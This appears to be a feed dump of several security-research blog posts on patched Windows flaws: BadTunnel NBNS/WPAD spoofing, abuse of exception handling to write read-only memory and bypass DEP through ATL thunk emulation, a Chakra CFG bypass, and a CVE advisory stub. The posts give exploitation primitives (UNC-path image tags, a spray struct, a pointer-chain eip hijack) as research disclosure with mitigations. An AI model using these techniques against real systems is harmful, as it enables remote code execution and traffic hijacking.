  1. Most hosts have a firewall enabled, which makes it impossible to send data to the host. Even if there is no firewall, there is no way to send data directly from the internet to the intranet. Does that mean we can only perform NBNS spoofing against systems that have a public IP address and no firewall enabled?
  2. There is a DNS protocol look-alike encapsulated within the NBNS protocol, so it also includes a Transaction ID. Only packets with matching Transaction IDs are accepted.
  3. How do we know when to send the NBNS spoofing packet, if the host outside the LAN cannot receive the NBNS NB query broadcast?

Fortunately, all these problems can be solved.

First, the Windows operating system only uses 137/UDP port for NBNS. “Only” means that the source and target ports are always 137/UDP. If an intranet host is sending NBNS request to, it will look like this: -> NAT:54231 ->

The response from will look like this: <- NAT:54231 <-

That is, the local firewalls on or NAT, or any other intermediate network devices, must allow any UDP packet from to to pass through in a certain amount of time, if it allows the query at all. This opens up a dual direction UDP tunnel, hence the name BadTunnel: <-> NAT:54231 <->

One quick experiment to help you understand this tunnel:

Prepare two systems with firewall enabled, with IP address set to and, respectively.

On, execute command “nbtstat -A”, it will fail.

On, execute command “nbtstat -A”, it will succeed.

On, execute “nbtstat -A” once again, it will succeed.

How can we make send a NBNS request to When Windows is trying to access a file URI scheme or UNC path with IP address, if the 139 and 445 port of the target is inaccessible – either timed out or been reset– the system will send a NBNS NBSTAT query to this IP address. There are numerous ways to make a system access a file URI scheme or UNC path.

The Microsoft Edge and Internet Explorer both try to resolve the file URI scheme or UNC path in the web page:

<img src=”\\\BadTunnel”>

All types of Microsoft Office documents can have embedded file URI scheme or UNC path, the same is true for many third-party document types.

If we have a shortcut with icon path point to a UNC path, this UNC path is accessed once the shortcut is shown on the screen.

If the target is a web server, maybe only one HTTP request is needed:


The NBNS Transaction ID is not random but incremental. As we have noted previously, the NBNS sends a NBNS NB query when resolving a name; the system sends a NBNS NBSTAT query when failing to access a file URI scheme or UNC path. NBNS NB query and NBNS NBSTAT query not only uses the same 137/UDP port, but also shares the same Transaction ID counter. That is, when fails to access \\\BadTunnel, the NBNS NBSTAT query it send to not only opens up a dual direction UDP tunnel, but also leaks the Transaction ID value to
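
The consequence of a shared, incrementing counter can be illustrated with a small Python sketch. It reads the 16-bit Transaction ID from the start of a captured NBNS packet (the header layout follows RFC 1002) and lists the IDs that would follow, assuming the counter advances by one per query and wraps at 16 bits. The function names and the sample bytes are hypothetical.

```python
import struct

NBNS_HEADER_LEN = 12  # ID, flags and four 16-bit counts, as in RFC 1002


def parse_transaction_id(packet):
    """Return the Transaction ID (first 16 bits, big-endian) of a packet."""
    if len(packet) < NBNS_HEADER_LEN:
        raise ValueError("packet shorter than an NBNS header")
    return struct.unpack_from(">H", packet, 0)[0]


def predict_next_ids(leaked_id, count=3):
    """Candidate IDs for later queries, assuming +1 per query and 16-bit wrap."""
    return [(leaked_id + step) & 0xFFFF for step in range(1, count + 1)]


if __name__ == "__main__":
    # Made-up header bytes standing in for a received NBSTAT query.
    leaked = parse_transaction_id(bytes.fromhex("8f2a") + bytes(10))
    print([hex(i) for i in predict_next_ids(leaked)])
```

If other name queries are issued in between, the next NB query may carry a later ID, which is why the sketch returns a short list of candidates rather than a single value.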

That is, a single NBNS NBSTAT query solved both problem 1 and 2. And the third problem is even easier to solve. Just like we can embed <img src=”\\\BadTunnel”> in our web page, we can also embed:

<img src="http://WPAD/wpad.dat">

In this way, we can control the time the system sends the NBNS NB query to WPAD, so we can craft our response in time. Finally the system will cache the response to http://WPAD/wpad.dat in its web cache. Later, when the system is requesting http://WPAD/wpad.dat to set proxy configuration, it will retrieve from the web cache. At least for Windows 7, the spoofed http://WPAD/wpad.dat will persist after reboots, just like other web resources.

Even if Web cache is not in place, the NBNS has its own caching mechanism. With one successful NBNS Spoofing, the spoofed response will be cached for 10 minutes:

In the next 10 minutes the operating system itself will also try to resolve the WPAD name and access http://WPAD/wpad.dat to download proxy configurations, so it will get the spoofed response. Once the attacker has successfully hijacked the user’s network flow, he can periodically redirect certain HTTP requests to make the BadTunnel attack persistent:

HTTP/1.1 302 Found
Content-Type: text/html
Location: file://
Content-Length: 0

0x02 Conclusion

The BadTunnel attack described in this article is a serious security problem, and its root cause is not easy to find. The following conditions are required for the attack to succeed:

  1. The UDP protocol is connectionless.
  2. Broadcast requests can accept responses from outside the network segment.
  3. WPAD is enabled by default on Windows.
  4. Windows file APIs support UNC paths by default.
  5. When Windows fails to access a UNC path by connecting to ports 139 and 445, an NBNS NBSTAT query is performed.
  6. NBNS always uses the same port on the client and server side.
  7. The NBNS Transaction ID uses a counter rather than an RNG.
  8. NBNS NBSTAT queries and NBNS NB queries share the same counter.
  9. WPAD shares the same Web and NBNS cache with other applications in the system.

None of these designs seems to be a problem on its own; some are even required. We certainly cannot blame UDP for being connectionless. Even though the NBNS Transaction ID is not randomly generated, this alone does not constitute a security vulnerability. The NBNS NB mechanism was designed for the intranet, and any host in the intranet can receive the NBNS NB query broadcast packets. However, although each design appears harmless in isolation, together they become a massive vulnerability. How can we find the next BadTunnel?

0x03 Mitigation Recommendations

Even if the MS16-063 and MS16-077 patches cannot be installed immediately, there are workarounds that can stop the BadTunnel attack.

Enterprises can drop 137/UDP packets at perimeter firewalls.

For end users that do not need to access Windows network sharing services, NetBIOS over TCP/IP can be disabled:

For minimal compatibility impact, the WPAD address can be pinned in %SystemRoot%\System32\drivers\etc\hosts, or automatic proxy discovery can be disabled to prevent hijacking:

However, BadTunnel is not limited to WPAD, and this does not stop hijacking of other names.

0x04 A Little Disappointment

Using BadTunnel to hijack WPAD is possibly the Windows vulnerability with the widest impact and the most exploit channels in history. It is also the only vulnerability that can target all versions of Windows with one exploit. It could have been more interesting.

Apple’s Mac OS also implemented NetBIOS, and supports UNC path in some cases. WPAD can also be manually enabled on it. However, due to the difference in the implementation details of NetBIOS protocol, this attack does not affect the Mac OS – it would be much cooler otherwise.

0x05 References

[1] Evilgrade

[2] 10 Places to Stick Your UNC Path

[3] Web Proxy Auto-Discovery Protocol

[4] NetBIOS Over TCP/IP

[5] Disable WINS/NetBT name resolution

[6] MS99-054, CVE-1999-0858

[7] MS09-008, CVE-2009-0093, CVE-2009-0094

[8] MS12-074, CVE-2012-4776

[9] MS16-063, CVE-2016-3213

[10] MS16-077, CVE-2016-3213, CVE-2016-3236

Exceptions in Exceptions – Abusing Special Cases in System Exception Handling to Achieve Unbelievable Vulnerability Exploitation http://xlab.tencent.com/en/2016/04/19/exception-in-exception/ Tue, 19 Apr 2016 08:21:21 +0000 http://xlab.tencent.com/en/?p=86

Memory read/write/execute attributes are among the most important parts of system security. Usually a block of memory must have the writable attribute set before it can be overwritten, and the executable attribute set before code in it can be executed; otherwise an exception is generated. However, there are some special cases in the Windows exception handling procedure that we can take advantage of. By abusing such exceptions, we could write to the unwritable, and execute the unexecutable.

0x01 Directly modify read-only memory locations

In my CanSecWest 2014 talk “ROPs are for the 99%” I introduced an interesting technique: by modifying a flag in JavaScript objects, we can disable the safe mode and let Internet Explorer (IE) load dangerous objects such as WScript.Shell, and execute arbitrary code without worrying about DEP.

Modifying SafeMode flag isn’t the only way to let IE load dangerous objects.

Some parts of IE are actually implemented in HTML. This HTML code is usually stored in the resource section of ieframe.dll. For example, the print preview page is in res://ieframe.dll/preview.dlg, the organize favorites page is in res://ieframe.dll/orgfav.dlg, the page properties page is in res://ieframe.dll/docppg.ppg, and so on.

IE creates separate renderer and JavaScript engine instances for these HTML resources, and SafeMode is disabled by default in the new JavaScript engine instances.

Therefore, we only need to insert our JavaScript code into the resource section of ieframe.dll and trigger the corresponding IE functionality. The code will then be executed as if it were part of that functionality, in a JavaScript engine instance with SafeMode disabled.

But the resource section of the PE file is read-only. If we use a write-what-where vulnerability to modify the resource of ieframe.dll, an access violation exception is generated:

eax=00000041 ebx=1e2e31b0 ecx=00000000 edx=00000083 esi=1e2e31b0 edi=68b77fe5
eip=69c6585f esp=0363ac00 ebp=0363ac84 iopl=0         nv up ei pl nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
69c6585f 88040f          mov     byte ptr [edi+ecx],al      ds:002b:68b77fe5=76
0:008> !exchain
0363b0f0: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363b648: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363bab8: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+1570 (69b421d1)
0363bb78: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+28c0 (69c71564)
0363bbc0: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+2898 (69c7150f)
0363bc44: jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+276a (69d0dedd)
0363c588: MSHTML!_except_handler4+0 (66495fa4)
  CRT scope  0, filter: MSHTML! ... Omitted... (6652bbe8) 
                func:   MSHTML!... Omitted... (6652bbf1)
0363c62c: user32!_except_handler4+0 (7569a61e)
  CRT scope  0, func:   user32!UserCallWinProcCheckWow+123 (75664456)
0363c68c: user32!_except_handler4+0 (7569a61e)
  CRT scope  0, filter: user32!DispatchMessageWorker+15e (756659b7)
                func:   user32!DispatchMessageWorker+171 (756659ca)
0363f9a8: ntdll!_except_handler4+0 (776a71f5)
  CRT scope  0, filter: ntdll!__RtlUserThreadStart+2e (776a74d0)
                func:   ntdll!__RtlUserThreadStart+63 (776a90eb)
0363f9c8: ntdll!FinalExceptionHandler+0 (776f7428)

In the above exception handler chain, the exception handler in mshtml.dll will call kernel32!RaiseFailFastException(). If g_fFailFastHandlerDisabled is set to false, the process will be terminated:

int __thiscall RaiseFailFastExceptionFilter(int this) {
  signed int **v1; // esi@1
  CONTEXT *v2; // ST04_4@2
  signed int v3; // eax@2
  UINT v4; // ST08_4@4
  HANDLE v5; // eax@4

  v1 = (signed int **)this;
  if ( !g_fFailFastHandlerDisabled ) {
    v2 = *(CONTEXT **)(this + 4);
    g_fFailFastHandlerDisabled = 1;
    RaiseFailFastException(*(PEXCEPTION_RECORD *)this, v2, 2u);
    v3 = 1653;
    if ( *v1 )
      v3 = **v1;
    v4 = v3;
    v5 = GetCurrentProcess();
    TerminateProcess(v5, v4);
  }
  return 0;
}

However, if g_fFailFastHandlerDisabled is set to true, the exception handling chain will call into kernel32!UnhandledExceptionFilter(), and finally kernel32!CheckForReadOnlyResourceFilter():

int __stdcall CheckForReadOnlyResourceFilter(int a1) {
  int result; // eax@2

  if ( BasepAllowResourceConversion )
    result = CheckForReadOnlyResource(a1, 0);
  else
    result = 0;
  return result;
}

If BasepAllowResourceConversion is also true, CheckForReadOnlyResource() will set the target page to writable, and return normally.

That is, if we first set both the g_fFailFastHandlerDisabled and BasepAllowResourceConversion flags to true, we can then directly modify the resource in ieframe.dll without worrying about its read-only attribute; the operating system will take care of it for us.
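
The effect of the two flags can be summarized as a small decision table. The Python sketch below is only a toy model of the behaviour described above, not the real Windows logic; the function name and the returned strings are made up for illustration.

```python
def write_to_readonly_resource(fail_fast_handler_disabled, allow_resource_conversion):
    """Toy model: outcome of a write to a read-only resource page."""
    if not fail_fast_handler_disabled:
        # RaiseFailFastExceptionFilter path: the process is terminated
        return "process terminated"
    if allow_resource_conversion:
        # CheckForReadOnlyResource path: the page is set to writable
        return "page made writable"
    # CheckForReadOnlyResourceFilter returns 0 and no conversion takes place
    return "no conversion"


for flags in [(False, False), (True, False), (True, True)]:
    print(flags, "->", write_to_readonly_resource(*flags))
```

Only the last combination, with both flags set, lets the write go through.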

There is one more small obstacle. Once page attribute modification is triggered in CheckForReadOnlyResource(), the RegionSize of the memory region also changes to one page, usually 0x1000. Before IE creates renderer instances from HTML resources in ieframe.dll, mshtml!GetResource() checks whether RegionSize is larger than the size of the resource, and fails otherwise. The solution is to overwrite the resource completely from start to end; RegionSize then grows accordingly and the check is bypassed.

We now have a surreal exploit thanks to the special case for the PE resource section in Windows write-exception handling.

0x02 Executing the unexecutable memory locations

In my VARA 2009 talk “Time Factors in Vulnerability Hunting” I introduced a rare module address use-after-free vulnerability. For example, thread A calls a function in module X, and module X in turn calls a time-consuming function in module Y. If thread B unloads module X before that call returns, the return address is invalid by the time the call returns. I found such problems in the Flash module of the Opera browser at that time. One of the download managers also had similar problems.

Some other vulnerability categories exhibit similar properties: execution is possible but the address is not controllable. In environments without DEP, these kinds of vulnerabilities are not hard to exploit; we only need to spray code to the target address. But with DEP enabled, these vulnerabilities are usually considered unexploitable.

But if we spray the target address with the following data:

typedef struct _THUNK3 {
    UCHAR MovEdx;       // 0xba         mov edx, imm32
    LONG EdxImmediate; 
    UCHAR MovEcx;       // 0xb9         mov ecx, imm32
    LONG EcxImmediate; // <- put your Stack Pivot here
    USHORT JmpEcx;      // 0xe1ff       jmp ecx
} Thunk3;

With DEP enabled, the target memory location is without doubt non-executable, yet surprisingly the system still appears to execute these instructions and jumps to the location in ecx. We only need to set ecx to make it jump to an arbitrary memory location and execute the ROP chain.

For compatibility reasons, Windows implements a mechanism called ATL thunk emulation. When the Windows kernel handles an execution exception, it checks whether the code at the exception address looks like an ATL thunk. If so, the kernel emulates its execution with the KiEmulateAtlThunk() routine.
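
To make the sprayed byte pattern concrete, here is a minimal Python sketch that packs the _THUNK3 layout shown above and applies a simplified opcode check. The helper names build_thunk3 and looks_like_thunk3 and the two immediate values are hypothetical; the immediates are packed as unsigned 32-bit values for convenience, and the kernel's actual validation does more than this opcode comparison.

```python
import struct

THUNK3_FORMAT = "<BIBIH"  # little-endian, no padding: 1 + 4 + 1 + 4 + 2 = 12 bytes


def build_thunk3(edx_value, ecx_target):
    """Pack: mov edx, imm32 / mov ecx, imm32 / jmp ecx."""
    return struct.pack(THUNK3_FORMAT, 0xBA, edx_value, 0xB9, ecx_target, 0xE1FF)


def looks_like_thunk3(data):
    """Simplified check that only compares the three opcode fields."""
    if len(data) < struct.calcsize(THUNK3_FORMAT):
        return False
    mov_edx, _, mov_ecx, _, jmp_ecx = struct.unpack_from(THUNK3_FORMAT, data)
    return (mov_edx, mov_ecx, jmp_ecx) == (0xBA, 0xB9, 0xE1FF)


thunk = build_thunk3(0x11111111, 0x41414141)  # placeholder immediates
print(thunk.hex(), looks_like_thunk3(thunk))
```

The USHORT value 0xe1ff is stored little-endian, so the bytes in memory are FF E1, which is the encoding of jmp ecx.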

There are some limitations. ATL thunk emulation checks whether the target address is within a PE file, and CFG checks are also enforced on supported systems. Since Windows Vista, ATL thunk emulation applies only to applications compiled without IMAGE_DLLCHARACTERISTICS_NX_COMPAT under the default DEP policy. If /NXCOMPAT is specified at build time, ATL thunk emulation is no longer supported. But there are still a lot of programs that do support ATL thunk emulation, including many third-party applications and 32-bit iexplore.exe. A vulnerability such as CVE-2015-2425, found in the leaked Hacking Team emails, is also exploitable with this technique if a heap spray is successful.

By abusing ATL thunk emulation in the system exception handling procedure, we make the unexecutable executable again, and bring some unexploitable vulnerabilities back to life.

Majority of this article was written in October 2014. Module addresses and symbol information were from Windows Technical Preview 6.4.9841 x64 with Internet Explorer 11.


[1] ROPs are for the 99%, CanSecWest 2014, Yang Yu
[2] Bypassing Browser Memory Protections
[3] (CVE-2015-2425) “Gifts” From Hacking Team Continue, IE Zero-Day Added to Mix
[4] Time Factors in Vulnerability Hunting, VARA 2009

Use Chakra engine again to bypass CFG http://xlab.tencent.com/en/2016/01/04/use-chakra-engine-again-to-bypass-cfg/ Mon, 04 Jan 2016 08:19:56 +0000 http://xlab.tencent.com/en/?p=84

This post was initially inspired by a talk with @TK, during which I learned the process and details of how to successfully bypass CFG (reference: use Chakra JIT to bypass DEP and CFG). Because the technique interested me, I spent some time reading related materials and found another location where CFG can be bypassed. I would like to thank @TK for enlightening me on the ideas and techniques mentioned in this post.

There are plenty of articles that analyze CFG. If you are interested, you may refer to my previous talk at HitCon 2015 (《spartan 0day & exploit》). To be clear, this post covers the part that was not revealed in that talk. With it, the method for achieving arbitrary code execution on Edge from a memory write is completely revealed.

0x01 The function calling logic of Chakra

When the Chakra engine calls a function, it handles the call differently depending on the function’s status: for example, a function called for the first time, a function called multiple times, a DOM interface function, and a function compiled by the JIT. Each type of function has its own processing flow, but in every case the Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > > function performs the call by calling the Js::JavascriptFunction::CallFunction<1> function.

1. The first call and subsequent calls of a function

When the following script runs, Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > > calls the function Js::JavascriptFunction::CallFunction<1>.

function test(){}


If the function is called for the first time, the execution flow will be:

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >

If the function is called again, the calling process will be:

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >

These two calling flows are almost identical. The main difference is that when the function is called for the first time, it has to go through the DeferredParsingThunk function to be parsed; this design is for efficiency. Subsequent calls execute the function directly.

Analysis shows that the sub-function called by Js::JavascriptFunction::CallFunction<1> is obtained from data in the Js::ScriptFunction object. The functions called subsequently, Js::JavascriptFunction::DeferredParsingThunk and NativeCodeGenerator::CheckCodeGenThunk, are both referenced from the Js::ScriptFunction object. Here is how Js::ScriptFunction differs between the two calls.

The Js::ScriptFunction object on the first call:

0:010> u poi(06eaf050 )

0:010> dd 06eaf050 
06eaf050  5f695580 06eaf080 00000000 00000000

0:010> dd poi(06eaf050+4) 
06eaf080  00000012 00000000 06e26c00 06e1fea0
06eaf090  5f8db3f0 00000000 5fb0b454 00000101

0:010> u poi(poi(06eaf050+4)+0x10)

The Js::ScriptFunction object on the second call:

0:010> u poi(06eaf050 )

0:010> dd 06eaf050 
06eaf050  5f695580 1ce1a0c0 00000000 00000000

0:010> dd poi(06eaf050+4)
1ce1a0c0  00000012 00000000 06e26c00 06e1fea0
1ce1a0d0  5f8db9e0 00000000 5fb0b454 00000101

0:010> u poi(poi(06eaf050+4)+0x10)

So the difference between the first call and subsequent calls is implemented by changing the function pointer in the Js::ScriptFunction object.
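
The pointer swap can be modelled in a few lines. The Python sketch below is a loose analogy, not Chakra code: the class and method names merely echo the symbols above, and the real object stores the pointer one level deeper (at [[object+4]+0x10] in the dumps) rather than as a direct attribute.

```python
class ScriptFunction:
    """Toy stand-in for Js::ScriptFunction: calls go through a stored entry point."""

    def __init__(self, body):
        self._body = body
        self.entry_point = self._deferred_parsing_thunk  # state before the first call

    def _deferred_parsing_thunk(self, *args):
        # First call: do the deferred work once, then swap the entry point
        self.entry_point = self._check_code_gen_thunk
        return self.entry_point(*args)

    def _check_code_gen_thunk(self, *args):
        return self._body(*args)

    def call(self, *args):
        # Plays the role of CallFunction: jump to whatever the object points at
        return self.entry_point(*args)


test = ScriptFunction(lambda: "ran")
before = test.entry_point.__name__
first_result = test.call()
after = test.entry_point.__name__
print(before, "->", after, first_result)
```

Because the caller always jumps through the stored pointer, whoever controls that pointer controls where the call lands, which is what the rest of this post relies on.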

2. JIT compilation of a function

Next we’ll look at JIT compilation of a function. Here is the test script, which triggers JIT compilation by calling the test1 function many times.

function test1(num)
{
    return num + 1 + 2 + 3;
}

//trigger jit


The Js::ScriptFunction object after JIT compilation:

//new debug, the memory address of the object will be different

0:010> u poi(07103050 )

0:010> dd 07103050 
07103050  5f695580 1d7280c0 00000000 00000000

0:010> dd poi(07103050+4)
1d7280c0  00000012 00000000 07076c00 071080a0
1d7280d0  0a510600 00000000 5fb0b454 00000101

0:010> u poi(poi(07103050+4)+0x10)          //jit code
0a510600 55              push    ebp
0a510601 8bec            mov     ebp,esp
0a510603 81fc5cc9d005    cmp     esp,5D0C95Ch
0a510609 7f21            jg      0a51062c
0a51060b 6a00            push    0
0a51060d 6a00            push    0
0a51060f 68d0121b04      push    41B12D0h
0a510614 685c090000      push    95Ch
0a510619 e802955b55      call    chakra!ThreadContext::ProbeCurrentStack2 (5fac9b20)
0a51061e 0f1f4000        nop     dword ptr [eax]
0a510622 0f1f4000        nop     dword ptr [eax]
0a510626 0f1f4000        nop     dword ptr [eax]
0a51062a 6690            xchg    ax,ax
0a51062c 6a00            push    0
0a51062e 8d6424ec        lea     esp,[esp-14h]
0a510632 56              push    esi
0a510633 53              push    ebx
0a510634 b8488e0607      mov     eax,7068E48h
0a510639 8038ff          cmp     byte ptr [eax],0FFh
0a51063c 7402            je      0a510640
0a51063e fe00            inc     byte ptr [eax]
0a510640 8b450c          mov     eax,dword ptr [ebp+0Ch]
0a510643 25ffffff08      and     eax,8FFFFFFh
0a510648 0fbaf01b        btr     eax,1Bh
0a51064c 83d802          sbb     eax,2
0a51064f 7c2f            jl      0a510680
0a510651 8b5d14          mov     ebx,dword ptr [ebp+14h] //ebx = num
0a510654 8bc3            mov     eax,ebx        //eax = tagged num ((num << 1) | 1)
0a510656 d1f8            sar     eax,1          //eax = num >> 1
0a510658 732f            jae     0a510689
0a51065a 8bf0            mov     esi,eax
0a51065c 8bc6            mov     eax,esi
0a51065e 40              inc     eax            //num + 1
0a51065f 7040            jo      0a5106a1
0a510661 8bc8            mov     ecx,eax
0a510663 83c102          add     ecx,2          //num + 2
0a510666 7045            jo      0a5106ad
0a510668 8bc1            mov     eax,ecx
0a51066a 83c003          add     eax,3          //num + 3
0a51066d 704a            jo      0a5106b9
0a51066f 8bc8            mov     ecx,eax
0a510671 d1e1            shl     ecx,1          //ecx = num << 1
0a510673 7050            jo      0a5106c5
0a510675 41              inc     ecx            //ecx = (result << 1) | 1
0a510676 8bd9            mov     ebx,ecx
0a510678 8bc3            mov     eax,ebx
0a51067a 5b              pop     ebx
0a51067b 5e              pop     esi
0a51067c 8be5            mov     esp,ebp
0a51067e 5d              pop     ebp
0a51067f c3              ret

After JIT compilation, the pointer to NativeCodeGenerator::CheckCodeGenThunk in the Js::ScriptFunction object is replaced with a pointer to the JIT code, so the call goes directly to the JIT code.

Simply put, when an integer parameter is passed to the called function, it is first shifted left by one bit and its lowest bit is set to 1 (parameter = (num << 1) | 1). So the first thing the function does after getting the parameter is to shift it right by one bit to recover the original value. As for why, I suppose it is related to the garbage collection mechanism of the script engine, which distinguishes objects from data by the lowest bit.
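
The tagging scheme visible in the listing (sar eax,1 on entry, shl ecx,1 followed by inc ecx on exit) can be reproduced with a short Python sketch. The helper names are hypothetical, and the overflow checks that the JIT code performs with jo are left out.

```python
def tag_int(value):
    """Encode a small integer as (value << 1) | 1 in a 32-bit word."""
    return ((value << 1) | 1) & 0xFFFFFFFF


def is_tagged_int(word):
    """Lowest bit set means the word holds an integer, not a pointer."""
    return word & 1 == 1


def untag_int(word):
    """Arithmetic shift right by one, like sar eax,1 on a 32-bit register."""
    if word & 0x80000000:
        word -= 1 << 32  # reinterpret as signed 32-bit
    return word >> 1


tagged = tag_int(5)
result = tag_int(untag_int(tagged) + 1 + 2 + 3)  # what test1(5) computes
print(hex(tagged), hex(result), untag_int(result))
```

Object pointers are aligned, so their lowest bit is 0, which is how the two kinds of values can share one slot.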

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
        |-jit code

The call stack above shows how the Chakra engine calls a JIT-compiled function.

3. DOM interface function

For completeness, there is another kind of function to mention: the DOM interface function, which is provided by another engine, such as the rendering engine (theoretically it can be other engines as well).


On execution, the above script goes through the following call flow until it reaches the engine that provides the interface function.

chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
        |-chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk //call dom interface function
            |-dom_interface_function    //EDGEHTML!CFastDOM::CDocument::Trampoline_createElement

When an interface function is called, the function object used by the Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > > function and the subsequent process differs from the ones used previously: it is a Js::JavascriptExternalFunction object. Then, as in the previous function calls, the function pointer stored in the object is resolved and called, and execution finally enters the desired DOM interface function.

0:010> u poi(06f2cea0)

0:010> dd 06f2cea0 
06f2cea0  5f696c4c 06e6f7a0 00000000 00000000

0:010> dd poi(06f2cea0+4)
06e6f7a0  00000012 00000000 06e76c00 06f040a0
06e6f7b0  5f8c6130 00000000 5fb0b454 00000101

0:010> u poi(poi(06f2cea0+4)+0x10)

These are the different call methods that chakra engine uses to call different types of functions.

0x02 Exploit and Exploitation

Having described how the Chakra engine calls the various kinds of functions, we now turn to the CFG vulnerability itself. As mentioned above, the first call of a function is handled differently from subsequent calls. Let’s look at the logic here; the following is the call stack:

//the first call
chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >
            |-chakra!Js::JavascriptFunction::DeferredParse    //obtain NativeCodeGenerator::CheckCodeGenThunk function

What was not mentioned above is the Js::JavascriptFunction::DeferredParse function in this flow. The work of parsing the function is done in DeferredParse, which returns the pointer to NativeCodeGenerator::CheckCodeGenThunk; control then returns to Js::JavascriptFunction::DeferredParsingThunk, which jumps to that pointer. The pointer to NativeCodeGenerator::CheckCodeGenThunk is itself obtained by walking the Js::JavascriptFunction object. Here is the code.

int __cdecl Js::JavascriptFunction::DeferredParsingThunk(struct Js::ScriptFunction *p_script_function)
{
  NativeCodeGenerator_CheckCodeGenThunk = Js::JavascriptFunction::DeferredParse(&p_script_function);
  return NativeCodeGenerator_CheckCodeGenThunk();
}

.text:002AB3F0 push    ebp
.text:002AB3F1 mov     ebp, esp
.text:002AB3F3 lea     eax, [esp+p_script_function]
.text:002AB3F7 push    eax             ; struct Js::ScriptFunction **
.text:002AB3F8 call    Js::JavascriptFunction::DeferredParse
.text:002AB3FD pop     ebp
.text:002AB3FE jmp     eax

At this jump, no CFG check is made on the function pointer in eax, so it can be used to hijack eip. But first we need to know how the NativeCodeGenerator::CheckCodeGenThunk pointer returned by Js::JavascriptFunction::DeferredParse is resolved from the Js::ScriptFunction object. Here is the resolution process.

0:010> u poi(070af050)

0:010> dd 070af050 + 14
070af064  076690e0 5fb11ef4 00000000 00000000

0:010> dd 076690e0 + 10
076690f0  076690e0 04186628 07065f90 00000000

0:010> dd 076690e0 + 28
07669108  07010dc0 000001a8 00000035 00000000

0:010> dd 07010dc0 
07010dc0  5f696000 05a452b8 00000000 5f8db9e0

0:010> u 5f8db9e0

As shown above, Js::JavascriptFunction::DeferredParse gets the NativeCodeGenerator::CheckCodeGenThunk function pointer by walking the Js::ScriptFunction object; the chain can be abbreviated as [[[Js::ScriptFunction+14]+10]+28]+0c (offsets in hexadecimal). So by forging the data in this memory and then calling the function, we trigger the call to Js::JavascriptFunction::DeferredParse and thereby hijack eip, as shown below.
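
The pointer chain can be replayed offline against the dumped values. The Python sketch below models memory as a dictionary filled with the dwords from the debugger output above; the function names are hypothetical, and the forged value is simply the gadget address that appears in the breakpoint listing.

```python
# Dwords taken from the debugger output above, keyed by address.
MEMORY = {
    0x070AF064: 0x076690E0,  # [Js::ScriptFunction + 0x14]
    0x076690F0: 0x076690E0,  # [previous + 0x10]
    0x07669108: 0x07010DC0,  # [previous + 0x28]
    0x07010DCC: 0x5F8DB9E0,  # [previous + 0x0c], the jump target
}
OFFSETS = (0x14, 0x10, 0x28, 0x0C)


def read_dword(memory, address):
    return memory[address]


def resolve_jump_target(memory, script_function):
    """Follow the four dereferences that end in the pointer used by jmp eax."""
    value = script_function
    for offset in OFFSETS:
        value = read_dword(memory, value + offset)
    return value


target = resolve_jump_target(MEMORY, 0x070AF050)

forged = dict(MEMORY)
forged[0x07010DCC] = 0x603BA064  # attacker-chosen value (xchg eax,esp; ret gadget)
hijacked = resolve_jump_target(forged, 0x070AF050)
print(hex(target), hex(hijacked))
```

Overwriting any link in the chain has the same effect, as long as the later offsets then point into attacker-controlled memory.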

0:010> g
Breakpoint 0 hit
eax=603ba064 ebx=063fba10 ecx=063fba40 edx=063fba40 esi=00000001 edi=058fc6b0
eip=603ba064 esp=058fc414 ebp=058fc454 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
chakra!`dynamic initializer for 'DOMFastPathInfo::getterTable''+0x734:
603ba064 94              xchg    eax,esp
603ba065 c3              ret

In this way, CFG is bypassed and eip is hijacked. The method is simple and stable, and it is convenient to use once you can read and write memory. This issue was reported to Microsoft on 25 July 2015.

0x03 Mitigation

Microsoft has fixed all the issues described in this post. The fix is relatively simple: add a CFG check at this jump.

.text:002AB460 push    ebp
.text:002AB461 mov     ebp, esp
.text:002AB463 lea     eax, [esp+arg_0]
.text:002AB467 push    eax
.text:002AB468 call    Js::JavascriptFunction::DeferredParse
.text:002AB46D mov     ecx, eax        ; this
.text:002AB46F call    ds:___guard_check_icall_fptr  //add cfg check
.text:002AB475 mov     eax, ecx
.text:002AB477 pop     ebp
.text:002AB478 jmp     eax


  1. 《Bypass DEP and CFG using JIT compiler in Chakra engine》

  2. 《spartan 0day & exploit》

Microsoft Internet Explorer And Microsoft Edge Object Use-After-Free Remote Code Execution Vulnerability http://xlab.tencent.com/en/2015/12/29/xlab-15-025/ Tue, 29 Dec 2015 09:59:19 +0000 http://xlab.tencent.com/en/?p=50

XLAB ID: XLAB-15-025

CVE ID: CVE-2015-1752     

Patch Status: Fixed

Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer and Microsoft Edge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. An attacker can leverage this vulnerability to execute code under the context of the current process.

Disclosure Timeline:

